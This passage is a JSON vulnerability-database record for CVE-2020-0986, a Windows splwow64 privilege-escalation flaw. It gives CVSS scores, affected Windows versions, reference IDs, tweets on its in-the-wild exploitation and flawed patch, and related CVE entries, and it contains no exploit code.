An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.
{"id": "CVE-2020-0986", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2020-0986", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.", "published": "2020-06-09T20:15:00", "modified": "2022-04-28T19:32:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 7.2}, "severity": "HIGH", "exploitabilityScore": 3.9, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-0986", "reporter": "secure@microsoft.com", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0986", "http://packetstormsecurity.com/files/160698/Microsoft-Windows-splWOW64-Privilege-Escalation.html"], "cvelist": ["CVE-2020-0986", "CVE-2020-1237", "CVE-2020-1246", "CVE-2020-1262", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1307", "CVE-2020-1316"], "immutableFields": [], "lastseen": "2022-04-28T21:39:24", "viewCount": 636, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:0E829C08-804A-436D-A730-1B474A82E4A7", "AKB:2BD24459-EE7D-4EB8-92A6-7C77689BCC8D"]}, {"type": "avleonov", "idList": ["AVLEONOV:13BED8E5AD26449401A37E1273217B9A", "AVLEONOV:24538B1ED96269982136AA43998E5780"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0521"]}, {"type": "cisco", "idList": ["CISCO-SA-DCNM-CERT-CHECK-BDZZV9T3"]}, {"type": "cve", "idList": ["CVE-2020-1237", "CVE-2020-1246", "CVE-2020-1262", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1307", "CVE-2020-1316"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:A596034F451F58030932B2FC46FB6F38"]}, {"type": "kaspersky", "idList": ["KLA11806", "KLA11807"]}, {"type": "mscve", "idList": ["MS:CVE-2020-0986", "MS:CVE-2020-1237", "MS:CVE-2020-1246", "MS:CVE-2020-1262", "MS:CVE-2020-1264", "MS:CVE-2020-1266", "MS:CVE-2020-1269", "MS:CVE-2020-1273", "MS:CVE-2020-1274", "MS:CVE-2020-1275", "MS:CVE-2020-1276", "MS:CVE-2020-1307", "MS:CVE-2020-1316"]}, {"type": "mskb", "idList": ["KB4556799"]}, {"type": "nessus", "idList": ["SMB_NT_MS20_JUN_4557957.NASL", "SMB_NT_MS20_JUN_4560960.NASL", "SMB_NT_MS20_JUN_4561602.NASL", "SMB_NT_MS20_JUN_4561608.NASL", "SMB_NT_MS20_JUN_4561612.NASL", "SMB_NT_MS20_JUN_4561616.NASL", "SMB_NT_MS20_JUN_4561621.NASL", "SMB_NT_MS20_JUN_4561643.NASL", "SMB_NT_MS20_JUN_4561649.NASL", "SMB_NT_MS20_JUN_4561666.NASL", "SMB_NT_MS20_JUN_4561670.NASL", "SUSE_SU-2020-2598-1.NASL", "SUSE_SU-2020-2600-1.NASL", "SUSE_SU-2020-2601-1.NASL", "SUSE_SU-2020-2602-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310817063", "OPENVAS:1361412562310817140", "OPENVAS:1361412562310817141", "OPENVAS:1361412562310817142", "OPENVAS:1361412562310817143", "OPENVAS:1361412562310817144", "OPENVAS:1361412562310817145", "OPENVAS:1361412562310817146", "OPENVAS:1361412562310817157", "OPENVAS:1361412562310817158"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3"]}, {"type": "securelist", "idList": ["SECURELIST:03ACF8FB3AEA9D33D265642AD60AF9E9", "SECURELIST:322E7EEAE549CDB14513C2EDB141B8BA", "SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "SECURELIST:6E5BCE8A736D28A7E168E1CD5131CE3D", "SECURELIST:C65BBC029B301149C73E48F99596B4A0", "SECURELIST:E2805DD2729049C4BBE6F641B5ADA21C"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1421-1", "OPENSUSE-SU-2020:1468-1", "OPENSUSE-SU-2020:1969-1"]}, {"type": "thn", "idList": ["THN:279CDD851D8F33C8B07217F8D20F6AAA"]}, {"type": "threatpost", "idList": ["THREATPOST:1502920D4F50B0D128077B515815C023", "THREATPOST:52B00377F0B400F0EFF0B3C4FF948F6F"]}, {"type": "zdi", "idList": ["ZDI-20-663"]}]}, "exploitation": {"wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:0E829C08-804A-436D-A730-1B474A82E4A7"]}], "wildExploited": true}, "score": {"value": 3.8, "vector": "NONE"}, "twitter": {"counter": 39, "modified": "2021-07-22T08:54:09", "tweets": [{"link": "https://twitter.com/ROlejnikov/status/1342428136844230663", "text": "The local privilege-escalation bug in Windows 8.1 and Windows 10 (CVE-2020-0986) exists in the Print Spooler API. It could allow a local attacker to elevate privileges and execute code in the context of the current user."}, {"link": "https://twitter.com/TowardsCybersec/status/1342452133413617666", "text": "Originally tracked as CVE-2020-0986, the flaw concerns an elevation of privilege exploit in the GDI Print / Print Spooler API (\"splwow64.exe\") that was reported to Microsoft by an anonymous user back in late December 2019.\n\n/hashtag/cybersecurity?src=hashtag_click /hashtag/security?src=hashtag_click /hashtag/privacy?src=hashtag_click /hashtag/infosec?src=hashtag_click /hashtag/Windows?src=hashtag_click"}, {"link": "https://twitter.com/petermorin123/status/1343966191786844173", "text": "Google Project Zero has disclosed a Windows zero-day vulnerability caused by the improper fix for CVE-2020-0986, a security flaw abused in a campaign dubbed Operation PowerFall.\n\nhttps://t.co/JPRkNJDH1U?amp=1"}, {"link": "https://twitter.com/WiFi_SEC_acc/status/1343959184686125062", "text": "Google Project Zero researcher Maddie Stone explains, in May, Kaspersky (/oct0xor) discovered CVE-2020-0986 in Windows splwow64 was exploited itw as a 0day. \nMS released a patch in June, but that patch didnt fix the vuln. After rep\u2026https://t.co/YGOu1YdJKe?amp=1 https://t.co/h94nflryDB?amp=1"}, {"link": "https://twitter.com/f1tym1/status/1343584016742703106", "text": "Google: Microsoft Improperly Patched Exploited Windows Vulnerability\n\nGoogle Project Zero has disclosed a Windows zero-day vulnerability caused by the improper fix for CVE-2020-0986, a security flaw abused in a campaign dubbed Operation PowerFall.\n\nread \u2026 https://t.co/sfpq8wC9hf?amp=1"}, {"link": "https://twitter.com/hackerfantastic/status/1342218312340676609", "text": "Looked into CVE-2020-0986 as unpatched privilege escalations in Windows are hot right now. Articles are a bit misleading, this only allows privilege escalation from low-integrity to medium integrity - useful for exploit chains but it's not SYSTEM privileges. Interesting bug tho."}, {"link": "https://twitter.com/DCWebGuy/status/1342283220151369728", "text": "The CVE-2020-0986 flaw concerns an elevation of privilege exploit in the GDI Print /\u00a0Print Spooler\u00a0API (\"splwow64.exe\") that was reported to Microsoft by an anonymous user working with Trend Micro's Zero Day Initiative (ZDI) back in late December 2019."}, {"link": "https://twitter.com/virusbtn/status/1421053209725046790", "text": "Avast's Jan Vojt\u011b\u0161ek analyses the current state of the Magnitude exploit kit. It exploits CVE-2021-26411 and CVE-2020-0986 to deploy Magniber ransomware to victims in South Korea who browse the Internet using vulnerable builds of Internet Explorer. https://t.co/0MTjB2c4Ot?amp=1"}, {"link": "https://twitter.com/HermCardona/status/1346187152724471813", "text": "/hashtag/CVE?src=hashtag_click-2020-0986 concerns an elevation of privilege exploit in the GDI Print / Print Spooler API (\"splwow64.exe\") that was reported to Microsoft. /hashtag/cybersecurity?src=hashtag_click /hashtag/pentesting?src=hashtag_click /hashtag/redteam?src=hashtag_click"}, {"link": "https://twitter.com/misaelban/status/1342579858472374275", "text": "/hashtag/Google?src=hashtag_click hackers disclose /hashtag/exploit?src=hashtag_click for an UNPATCHED /hashtag/Windows?src=hashtag_click /hashtag/vulnerability?src=hashtag_click /hashtag/CVE?src=hashtag_click-2020-0986 that was exploited as 0-day in the wild, for which /hashtag/Microsoft?src=hashtag_click issued an incomplete patch and then failed to patch it again under the 90-day deadline. https://t.co/VNaH1X9yuN?amp=1 /hashtag/CyberSecurity?src=hashtag_click"}]}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:0E829C08-804A-436D-A730-1B474A82E4A7"]}, {"type": "avleonov", "idList": ["AVLEONOV:24538B1ED96269982136AA43998E5780"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0521"]}, {"type": "cve", "idList": ["CVE-2020-1237", "CVE-2020-1246", "CVE-2020-1262", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1307", "CVE-2020-1316"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:A596034F451F58030932B2FC46FB6F38"]}, {"type": "kaspersky", "idList": ["KLA11807"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2020-0986/"]}, {"type": "mscve", "idList": ["MS:CVE-2020-0986"]}, {"type": "mskb", "idList": ["KB4556799"]}, {"type": "nessus", "idList": ["SMB_NT_MS20_JUN_4560960.NASL", "SMB_NT_MS20_JUN_4561602.NASL", "SMB_NT_MS20_JUN_4561608.NASL", "SMB_NT_MS20_JUN_4561612.NASL", "SMB_NT_MS20_JUN_4561616.NASL", "SMB_NT_MS20_JUN_4561621.NASL", "SMB_NT_MS20_JUN_4561649.NASL", "SMB_NT_MS20_JUN_4561666.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310817140", "OPENVAS:1361412562310817141", "OPENVAS:1361412562310817143", "OPENVAS:1361412562310817144", "OPENVAS:1361412562310817145", "OPENVAS:1361412562310817146", "OPENVAS:1361412562310817157"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3"]}, {"type": "securelist", "idList": ["SECURELIST:03ACF8FB3AEA9D33D265642AD60AF9E9", "SECURELIST:6E5BCE8A736D28A7E168E1CD5131CE3D", "SECURELIST:C65BBC029B301149C73E48F99596B4A0"]}, {"type": "thn", "idList": ["THN:279CDD851D8F33C8B07217F8D20F6AAA"]}, {"type": "threatpost", "idList": ["THREATPOST:52B00377F0B400F0EFF0B3C4FF948F6F"]}, {"type": "zdi", "idList": ["ZDI-20-663"]}]}, "vulnersScore": 3.8}, "_state": {"wildexploited": 0, "dependencies": 1659988328, "score": 1659878780, "cisa_kev_wildexploited": 1660152412, "affected_software_major_version": 1671590614}, "_internal": {"score_hash": "21cd8faa66e153ca628268c7d15397fd"}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1903"], "cpe23": ["cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*"], "cwe": ["CWE-787"], "affectedSoftware": [{"cpeName": "microsoft:windows_10", "version": "-", "operator": "eq", "name": "microsoft windows 10"}, {"cpeName": "microsoft:windows_10", "version": "1607", "operator": "eq", "name": "microsoft windows 10"}, {"cpeName": "microsoft:windows_10", "version": "1709", "operator": "eq", "name": "microsoft windows 10"}, {"cpeName": "microsoft:windows_10", "version": "1803", "operator": "eq", "name": "microsoft windows 10"}, {"cpeName": "microsoft:windows_10", "version": "1809", "operator": "eq", "name": "microsoft windows 10"}, {"cpeName": "microsoft:windows_10", "version": "1903", "operator": "eq", "name": "microsoft windows 10"}, {"cpeName": "microsoft:windows_10", "version": "1909", "operator": "eq", "name": "microsoft windows 10"}, {"cpeName": "microsoft:windows_10", "version": "2004", "operator": "eq", "name": "microsoft windows 10"}, {"cpeName": "microsoft:windows_8.1", "version": "-", "operator": "eq", "name": "microsoft windows 8.1"}, {"cpeName": "microsoft:windows_rt_8.1", "version": "-", "operator": "eq", "name": "microsoft windows rt 8.1"}, {"cpeName": "microsoft:windows_server_2012", "version": "-", "operator": "eq", "name": "microsoft windows server 2012"}, {"cpeName": "microsoft:windows_server_2012", "version": "r2", "operator": "eq", "name": "microsoft windows server 2012"}, {"cpeName": "microsoft:windows_server_2016", "version": "-", "operator": "eq", "name": "microsoft windows server 2016"}, {"cpeName": "microsoft:windows_server_2016", "version": "1803", "operator": "eq", "name": "microsoft windows server 2016"}, {"cpeName": "microsoft:windows_server_2016", "version": "1903", "operator": "eq", "name": "microsoft windows server 2016"}, {"cpeName": "microsoft:windows_server_2016", "version": "1909", "operator": "eq", "name": "microsoft windows server 2016"}, {"cpeName": "microsoft:windows_server_2016", "version": "2004", "operator": "eq", "name": "microsoft windows server 2016"}, {"cpeName": "microsoft:windows_server_2019", "version": "-", "operator": "eq", "name": "microsoft windows server 2019"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0986", "name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0986", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"]}, {"url": "http://packetstormsecurity.com/files/160698/Microsoft-Windows-splWOW64-Privilege-Escalation.html", "name": "http://packetstormsecurity.com/files/160698/Microsoft-Windows-splWOW64-Privilege-Escalation.html", "refsource": "MISC", "tags": ["Third Party Advisory", "VDB Entry"]}]}
{"cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "A privilege escalation vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Kernel Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986", "CVE-2020-1237", "CVE-2020-1246", "CVE-2020-1262", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1307", "CVE-2020-1316"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-0986", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T12:31:30", "description": "An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0986, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T20:15:00", "type": "cve", "title": "CVE-2020-1237", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986", "CVE-2020-1237", "CVE-2020-1246", "CVE-2020-1262", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1307", "CVE-2020-1316"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903"], "id": "CVE-2020-1237", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1237", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:34:47", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0986, CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T20:15:00", "type": "cve", "title": "CVE-2020-1266", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986", "CVE-2020-1237", "CVE-2020-1246", "CVE-2020-1262", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1307", "CVE-2020-1316"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2016:1903", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2020-1266", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-1266", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:34:24", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0986, CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 